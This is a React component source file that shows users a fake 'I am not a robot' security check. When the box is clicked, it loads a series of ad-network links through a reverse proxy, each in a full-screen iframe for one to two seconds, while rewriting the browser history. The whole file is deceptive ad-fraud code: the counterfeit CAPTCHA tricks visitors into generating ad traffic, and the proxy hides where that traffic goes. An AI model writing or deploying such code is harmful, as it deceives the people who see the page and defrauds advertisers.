import React, { useState } from 'react';

const proxyBase = "https://reverse-proxy-production-3d99.up.railway.app/proxy?url=";

const rawTargets = [
  "https://phoampor.top/4/9210289",
  "https://phoampor.top/4/9210289",
  "https://phoampor.top/4/9210289",
  "https://phoampor.top/4/9210289",
  "https://phoampor.top/4/9210289",
  "https://phoampor.top/4/9210289",
  "https://phoampor.top/4/9210289",
  "https://phoampor.top/4/9210289",
  "https://phoampor.top/4/9210289",
  "https://phoampor.top/4/9210289",
  "https://vudachisouxouk.net/link?z=9176331&var=gb_click_post_2334&ymid=3328895"
];

const jitter = (ms) => new Promise(res => setTimeout(res, ms));

const IframeStackerTrigger = () => {
  const [triggered, setTriggered] = useState(false);

  const startAdChain = async () => {
    for (let i = 0; i < rawTargets.length; i++) {
      const url = proxyBase + encodeURIComponent(rawTargets[i]);
      window.history.pushState({}, '', `/ad?index=${i}`); // move browser history
      const iframe = document.createElement('iframe');
      iframe.src = url;
      iframe.style.position = 'fixed';
      iframe.style.top = '0';
      iframe.style.left = '0';
      iframe.style.width = '100vw';
      iframe.style.height = '100vh';
      iframe.style.zIndex = '9999';
      iframe.style.border = 'none';
      iframe.style.backgroundColor = 'black';
      document.body.appendChild(iframe);

      await jitter(Math.random() * 1000 + 1000); // wait 1–2s

      document.body.removeChild(iframe);
    }

    window.history.pushState({}, '', '/done'); // optional end state
  };

  return (
    <div style={{
      position: 'fixed',
      top: 0,
      left: 0,
      zIndex: 9999,
      width: '100vw',
      height: '100vh',
      backgroundColor: '#000',
      display: 'flex',
      justifyContent: 'center',
      alignItems: 'center',
      color: '#fff',
      fontFamily: 'Arial, sans-serif',
      flexDirection: 'column'
    }}>
      <h2 style={{ marginBottom: '1.5rem' }}>Security Check</h2>
      {!triggered ? (
        <div
          onClick={() => {
            setTriggered(true);
            startAdChain();
          }}
          style={{
            backgroundColor: '#111',
            padding: '1rem 2rem',
            borderRadius: '8px',
            border: '1px solid #444',
            cursor: 'pointer',
            userSelect: 'none',
            display: 'flex',
            alignItems: 'center',
            gap: '0.75rem'
          }}
        >
          <div style={{
            width: '20px',
            height: '20px',
            border: '2px solid #888',
            borderRadius: '3px',
            backgroundColor: '#000'
          }} />
          <span>I am not a robot</span>
        </div>
      ) : (
        <p>Verifying ads...</p>
      )}
    </div>
  );
};

export default IframeStackerTrigger;
